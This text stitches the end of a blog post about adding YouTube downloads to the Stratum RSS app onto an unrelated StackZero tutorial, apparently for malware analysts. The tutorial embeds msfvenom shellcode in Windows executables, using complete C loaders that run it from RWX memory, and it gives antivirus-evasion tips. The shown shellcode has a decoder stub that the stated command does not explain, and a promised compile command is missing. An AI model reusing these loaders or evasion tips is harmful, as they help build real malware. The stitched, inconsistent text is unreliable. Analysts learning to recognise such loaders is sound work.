
only, some have video only, and some have both video and audio. And they are also available in multiple formats. For video there is AVC (which is apparently H.264), VP09, and AV01. And for audio there's Mp4a and Opus. I don't know what Opus is but apparently it is noticeably better than Mp4a. So if you've ever gone to a YouTube download page and seen a million download options, that's why. Although I hide the redundant ones and just display the one with the lowest file size at that quality level (usually VP09 or AV01).

It's actually pretty cool to see AV01, as I talked about it here (https://readmedium.com/why-apple-adding-av1-support-is-a-big-deal-faa46a356f3c). And it does compress videos a little better than VP09 and a lot better than AVC.

Also, apparently YouTube does something called DRC, dynamic range compression (not the Democratic Republic of Congo). It makes the quiet sections louder and the loud sections quieter. Apparently people really hate it, and I guess there must be a way to disable it because I have not been able to find a music video with DRC enabled. I've never heard anyone talk about this before though.

So now that we have the formats we can just download them. Each format has a download link, oddly enough. I did not expect that. Just keep in mind that the YouTube download links expire in 6 hours.

Of course here we run into a problem. When I saw this I was like, "Great, let's just download an audio-only track if we only want audio or a video+audio track if we want video."

[Embedded GIF from Giphy]

If you do that you're restricted to at most 720p 30fps. Or so I'm told. I haven't been able to find a file with both video and audio over 360p. And some videos don't have any video+audio tracks at all. So that means we're going to have to download a video file and an audio file (preferably without DRC) and merge them together.

And this is perhaps the first really big problem I ran into. If I was doing this locally it would not be that big of a problem because there's a nice command line package called FFmpeg that will just do it for you. Unfortunately it's a bit more complicated when you're working with Node.js because you have to do a bunch of file manipulation stuff.

I ended up deciding to just download the files from Google's servers separately and then merge them locally. Apparently Flutter has a package called FFmpeg-kit that will do this. Unfortunately it only works on Android, iOS, and macOS.

Although Android will not be getting YouTube downloading because Google is really strict about that.

[Embedded tweet: https://twitter.com/EzraDuown/status/1776352074449530961/]

In fact the app mentioned above, NewPipe, is not available on the Google Play store. So that means that the only platform able to benefit from YouTube downloading is iOS. There is no macOS version of the app but you can run the iOS app on an Apple Silicon Mac. Web users will be restricted to downloading audio or downloading 360p videos. Oh well. Maybe I'll improve this feature in the future.

And another problem. YouTube throttles some of the downloads. Not all of them though, which is weird. I thought it was broken at first. Nope, it's just that the downloads were really, really slow.

Although there's a way around this too. Flutter has its own package for downloading YouTube videos called youtube_explode_dart, and this one has gotten around the throttling issues. It's listed as issue #180 and fixed in pull request 185.

[Image]

And it works great now. Well, for the streams it supports. It doesn't support all the streams. But it supports enough.

And one more thing: youtube_explode_dart doesn't actually do everything youtube-dl does. youtube-dl actually gives you a lot more information on the actual files (such as whether the audio is DRCed). So I'm still going to have to use it. But I can use youtube_explode_dart to actually download the files.

I do feel a little silly for wasting so much time on this feature. Like, I built an RSS reader to watch YouTube videos, not to download them. And the only people that can really take advantage of this feature are iOS users.

It's funny. Everyone thinks iOS is the locked-down one. But in this one specific case Android is more locked down. Because if you look up YouTube downloaders on iOS there are pages and pages of them.

I could see myself taking advantage of this feature. Stratum 3.0.0 also introduces the ability to add external links. So I could find a YouTube video I like that I want to download and I could just download it.

And this experience has taught me a lot about the inner workings of YouTube. Mostly the subtitles. I had no idea the method I was using to get subtitles before was so suboptimal. It works and there's nothing wrong with it, but it could be better.

I'm pretty happy with Stratum's YouTube functionality now. I was happy with it before, to be honest, I just went down a 'YouTube rabbit hole'. But I did have one more feature planned: automatic YouTube summary generation.

Because since adding YouTube summaries I've been watching a lot more YouTube. I mean summarizing a lot more YouTube. There are a lot of channels I'm interested in but can't get to due to time restrictions. Like TED and DW News. Guess what? I follow both of those sources of news now and just read the summaries. But you know what I don't like? Tapping on the button to generate the summaries.

Well, those are some future plans. It will be expensive though, which is also why I'm planning to announce new pricing for Stratum soon.

If you liked this post and would like to stay updated with my future articles, consider using my RSS app Stratum on iOS (https://apple.co/3rZyh9B) and Android (https://play.google.com/store/apps/details?id=com.amorfatite.keystone). Also check out my language learning app Litany (iOS: https://apple.co/45prCDA, Android: https://play.google.com/store/apps/details?id=com.amorfatite.litany).

How to embed shellcode payload into an executable quickly — StackZero

Introduction

A good malware analyst has to know how to embed a shellcode payload into an executable in just a few minutes: building one yourself is the best way to recognise it during an analysis.

Trojans, or more generally malware, often embed shellcode within their code; in particular, an attacker can hide it within one of the executable's sections.

In this article we will see how to do this in practice for the first two of those sections, .text and .data. The code has only an explanatory purpose: a real malware developer would pay much more attention to, for example, avoiding being “discovered” by an anti-malware product.

Prerequisites

To begin with, we need a Windows machine and a Linux machine. For this purpose I will use two virtual machines in VirtualBox:

  • Kali Linux
  • Flare VM (Windows 7 Ultimate x64)

Shellcode Generation

The malware we are going to write is totally harmless: the final result will simply be the launch of calc.exe (for proofs of concept on Windows we usually launch either calc.exe or notepad.exe).

The first step is to generate the shellcode; for this we will use msfvenom on our Kali Linux machine.

$ msfvenom -p windows/x64/exec --format c CMD=calc.exe EXITFUNC=thread

Let’s analyze the options:

  • -p windows/x64/exec indicates that we are asking for the exec payload.
  • --format c asks for the shellcode to be formatted for the C language.
  • CMD=calc.exe is a payload option and specifies which command to run.
  • EXITFUNC=thread is another payload option: it is the function to call at the end of the shellcode's execution; specifying ‘thread’ will call ExitThread.

This command will output the following shellcode:

unsigned char buf[] = "\xeb\x27\x5b\x53\x5f\xb0\xb0\xfc\xae\x75\xfd\x57\x59\x53\x5e" "\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\xd8\xcd" "\x74\x07\x80\x3e\xb0\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff" "\xff\x07\xb0\xfb\x4f\x84\xe3\xf7\xef\xc7\x07\x07\x07\x46\x56" "\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f\x8c\x55\x67\x4f\x8c" "\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75\x57\x4f\x08\xb0\x4d\x4d" "\x4a\x36\xce\x4f\x36\xc7\xab\x3b\x66\x7b\x05\x2b\x27\x46\xc6" "\xce\x0a\x46\x06\xc6\xe5\xea\x55\x46\x56\x4f\x8c\x55\x27\x8c" "\x45\x3b\x4f\x06\xd7\x8c\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73" "\x60\x4f\x06\xd7\x57\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7" "\xe4\x51\x4f\xf8\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce" "\x4f\x36\xc7\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6" "\x4b\x04\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23" "\x4e\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7" "\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d\x46" "\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7\x5f\x46" "\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f\xbd\x06\x07" "\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06\x07\x07\x46\xbd" "\x36\x8c\x68\x80\xf8\xd2\xbc\xe7\x1a\x2d\x0d\x46\xbd\xa1\x92" "\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b\x01\x7b\x0d\x87\xfc\xe7" "\x72\x02\xbc\x40\x14\x75\x68\x6d\x07\x5e\x46\x8e\xdd\xf8\xd2" "\x64\x66\x6b\x64\x29\x62\x7f\x62\x07\xd8\xcd";

Now save the output and move to your Windows machine, where we will use the Visual Studio editor.

Embed shellcode payload into an executable

The first step includes importing the necessary libraries:

#include <windows.h> 
#include <stdio.h> 
#include <string.h> 
#include <stdlib.h>

Next we will declare the variables we need and initialise the array containing the shellcode.

void *shellcode_alloc_mem;   /* buffer that will receive the shellcode */
HANDLE threadHandle;         /* thread that will run it */
unsigned char shellcode[] =
"\xeb\x27\x5b\x53\x5f\xb0\xb0\xfc\xae\x75\xfd\x57\x59\x53\x5e"
"\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\xd8\xcd"
"\x74\x07\x80\x3e\xb0\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff"
"\xff\x07\xb0\xfb\x4f\x84\xe3\xf7\xef\xc7\x07\x07\x07\x46\x56"
"\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f\x8c\x55\x67\x4f\x8c"
"\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75\x57\x4f\x08\xb0\x4d\x4d"
"\x4a\x36\xce\x4f\x36\xc7\xab\x3b\x66\x7b\x05\x2b\x27\x46\xc6"
"\xce\x0a\x46\x06\xc6\xe5\xea\x55\x46\x56\x4f\x8c\x55\x27\x8c"
"\x45\x3b\x4f\x06\xd7\x8c\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73"
"\x60\x4f\x06\xd7\x57\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7"
"\xe4\x51\x4f\xf8\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce"
"\x4f\x36\xc7\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6"
"\x4b\x04\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23"
"\x4e\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7"
"\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d\x46"
"\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7\x5f\x46"
"\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f\xbd\x06\x07"
"\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06\x07\x07\x46\xbd"
"\x36\x8c\x68\x80\xf8\xd2\xbc\xe7\x1a\x2d\x0d\x46\xbd\xa1\x92"
"\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b\x01\x7b\x0d\x87\xfc\xe7"
"\x72\x02\xbc\x40\x14\x75\x68\x6d\x07\x5e\x46\x8e\xdd\xf8\xd2"
"\x64\x66\x6b\x64\x29\x62\x7f\x62\x07\xd8\xcd";
unsigned int shellcode_len = sizeof(shellcode) / sizeof(unsigned char);

After these steps, we will allocate an area of memory into which to copy the shellcode, using VirtualAlloc. The prototype of the function is this:

LPVOID VirtualAlloc( 
    LPVOID lpAddress,
    SIZE_T dwSize, 
    DWORD flAllocationType, 
    DWORD flProtect );

We then let the system decide where to allocate (lpAddress = 0) a region as long as the shellcode, reserved and committed in a single call, with read, write and execute permissions:

shellcode_alloc_mem = VirtualAlloc(0, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );

The following functions will help us: RtlMoveMemory, CreateThread and WaitForSingleObject.

The code needs a little comment. RtlMoveMemory is quite simple: it takes destination, source and length as parameters (in that order, matching the call below) and moves the specified number of bytes from the source to the destination. CreateThread receives the routine as its third parameter, which in our case is the allocated buffer holding the shellcode, cast to LPTHREAD_START_ROUTINE. WaitForSingleObject waits for the thread to finish.

I don’t want to add more elements, but before showing the complete code I wanted to point out that an antivirus will normally flag as suspicious a region that is readable, writable and executable at the same time. What malware developers usually do instead is allocate with PAGE_READWRITE, copy the shellcode, and then call VirtualProtect to change the protection to PAGE_EXECUTE_READ.

But now let’s see the complete code:

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(void)
{
    void *shellcode_alloc_mem;   /* RWX buffer that will hold the shellcode */
    HANDLE threadHandle;
    unsigned char shellcode[] =
"\xeb\x27\x5b\x53\x5f\xb0\xb0\xfc\xae\x75\xfd\x57\x59\x53\x5e"
"\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\xd8\xcd"
"\x74\x07\x80\x3e\xb0\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff"
"\xff\x07\xb0\xfb\x4f\x84\xe3\xf7\xef\xc7\x07\x07\x07\x46\x56"
"\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f\x8c\x55\x67\x4f\x8c"
"\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75\x57\x4f\x08\xb0\x4d\x4d"
"\x4a\x36\xce\x4f\x36\xc7\xab\x3b\x66\x7b\x05\x2b\x27\x46\xc6"
"\xce\x0a\x46\x06\xc6\xe5\xea\x55\x46\x56\x4f\x8c\x55\x27\x8c"
"\x45\x3b\x4f\x06\xd7\x8c\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73"
"\x60\x4f\x06\xd7\x57\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7"
"\xe4\x51\x4f\xf8\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce"
"\x4f\x36\xc7\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6"
"\x4b\x04\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23"
"\x4e\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7"
"\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d\x46"
"\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7\x5f\x46"
"\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f\xbd\x06\x07"
"\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06\x07\x07\x46\xbd"
"\x36\x8c\x68\x80\xf8\xd2\xbc\xe7\x1a\x2d\x0d\x46\xbd\xa1\x92"
"\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b\x01\x7b\x0d\x87\xfc\xe7"
"\x72\x02\xbc\x40\x14\x75\x68\x6d\x07\x5e\x46\x8e\xdd\xf8\xd2"
"\x64\x66\x6b\x64\x29\x62\x7f\x62\x07\xd8\xcd";
    unsigned int shellcode_len = sizeof(shellcode) / sizeof(unsigned char);

    /* let the system pick the address; reserve and commit a RWX region */
    shellcode_alloc_mem = VirtualAlloc(0, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    getchar();   /* pause so a debugger can be attached before execution */
    if (shellcode_alloc_mem)
    {
        RtlMoveMemory(shellcode_alloc_mem, shellcode, shellcode_len);
        threadHandle = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)shellcode_alloc_mem, 0, 0, 0);
        WaitForSingleObject(threadHandle, INFINITE);
    }
    return 0;
}

In this case our shellcode is inside the .text section; to place it in the .data section simply make the variable global, exactly as I show in this example.

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/* global array: the shellcode now lives in the .data section */
unsigned char shellcode[] =
"\xeb\x27\x5b\x53\x5f\xb0\xb0\xfc\xae\x75\xfd\x57\x59\x53\x5e"
"\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\xd8\xcd"
"\x74\x07\x80\x3e\xb0\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff"
"\xff\x07\xb0\xfb\x4f\x84\xe3\xf7\xef\xc7\x07\x07\x07\x46\x56"
"\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f\x8c\x55\x67\x4f\x8c"
"\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75\x57\x4f\x08\xb0\x4d\x4d"
"\x4a\x36\xce\x4f\x36\xc7\xab\x3b\x66\x7b\x05\x2b\x27\x46\xc6"
"\xce\x0a\x46\x06\xc6\xe5\xea\x55\x46\x56\x4f\x8c\x55\x27\x8c"
"\x45\x3b\x4f\x06\xd7\x8c\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73"
"\x60\x4f\x06\xd7\x57\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7"
"\xe4\x51\x4f\xf8\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce"
"\x4f\x36\xc7\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6"
"\x4b\x04\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23"
"\x4e\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7"
"\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d\x46"
"\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7\x5f\x46"
"\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f\xbd\x06\x07"
"\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06\x07\x07\x46\xbd"
"\x36\x8c\x68\x80\xf8\xd2\xbc\xe7\x1a\x2d\x0d\x46\xbd\xa1\x92"
"\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b\x01\x7b\x0d\x87\xfc\xe7"
"\x72\x02\xbc\x40\x14\x75\x68\x6d\x07\x5e\x46\x8e\xdd\xf8\xd2"
"\x64\x66\x6b\x64\x29\x62\x7f\x62\x07\xd8\xcd";
int main(void)
{
    void *shellcode_alloc_mem;   /* RWX buffer that will hold the shellcode */
    HANDLE threadHandle;
    unsigned int shellcode_len = sizeof(shellcode) / sizeof(unsigned char);

    /* let the system pick the address; reserve and commit a RWX region */
    shellcode_alloc_mem = VirtualAlloc(0, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    getchar();   /* pause so a debugger can be attached before execution */
    if (shellcode_alloc_mem)
    {
        RtlMoveMemory(shellcode_alloc_mem, shellcode, shellcode_len);
        threadHandle = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)shellcode_alloc_mem, 0, 0, 0);
        WaitForSingleObject(threadHandle, INFINITE);
    }
    return 0;
}

And finally, let’s see the command to compile, to be run in the x64 Native Tools command prompt.

At this point, when running, you should see a paused terminal; on pressing a key a thread will be launched and the shellcode executed. I suggest analysing the behaviour with a debugger such as x64dbg.
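As an added example (not code from the original article), here is a small Python scanner an analyst can point at the compiled binary to answer the question the section placement raises: which PE section holds the shellcode bytes, and with what permissions. It parses the section table directly, searches each section's raw data for the decoder-stub prefix of the msfvenom output above, and builds a constructed two-section PE fixture so it runs offline; the flag values follow the PE/COFF specification.

```python
import struct
# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Signature to search for: the first 15 bytes of the msfvenom output shown above
# (its decoder stub). A constructed choice for this example, not a vendor signature.
SHELLCODE_PREFIX = b"\xeb\x27\x5b\x53\x5f\xb0\xb0\xfc\xae\x75\xfd\x57\x59\x53\x5e"

def parse_sections(pe):
    """Walk the PE section table, yielding (name, raw_ptr, raw_size, characteristics)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4  # COFF file header
    num_sections, opt_size = struct.unpack_from("<H12xH", pe, coff + 2)
    table = coff + 20 + opt_size  # first IMAGE_SECTION_HEADER follows the optional header
    for i in range(num_sections):
        off = table + 40 * i
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr, chars = struct.unpack_from("<II12xI", pe, off + 16)
        yield name, raw_ptr, raw_size, chars

def perms(chars):
    """Render the section's memory protection as an RWX-style string."""
    return ("R" if chars & IMAGE_SCN_MEM_READ else "-") + \
           ("W" if chars & IMAGE_SCN_MEM_WRITE else "-") + \
           ("X" if chars & IMAGE_SCN_MEM_EXECUTE else "-")

def find_in_sections(pe, needle=SHELLCODE_PREFIX):
    """List (section, offset within section, perms) for every section containing needle."""
    hits = []
    for name, raw_ptr, raw_size, chars in parse_sections(pe):
        idx = pe[raw_ptr:raw_ptr + raw_size].find(needle)
        if idx != -1:
            hits.append((name, idx, perms(chars)))
    return hits

def build_minimal_pe(sections):
    """Constructed PE32+ fixture from (name, data, characteristics) triples; not loadable."""
    e_lfanew, opt_size = 0x40, 240
    data_start = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    img = bytearray(b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew))
    img += b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    img += struct.pack("<H", 0x20B).ljust(opt_size, b"\0")  # PE32+ magic, rest zeroed
    body = bytearray()
    for i, (name, data, chars) in enumerate(sections):
        img += name.encode().ljust(8, b"\0") + struct.pack(
            "<IIII12xI", len(data), 0x1000 * (i + 1), len(data), data_start + len(body), chars)
        body += data
    return bytes(img + body)
```

Note that the shellcode shown in this article decodes itself in place (the stub at the start XORs the bytes that follow it), so whichever section it is stored in, the copy that runs must sit in memory that is writable as well as executable. The VirtualProtect approach described above therefore only works with shellcode that does not write to its own buffer.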

Further Readings

If you found it interesting to read, I recommend the following articles.

Originally published at https://www.stackzero.net on September 30, 2021.
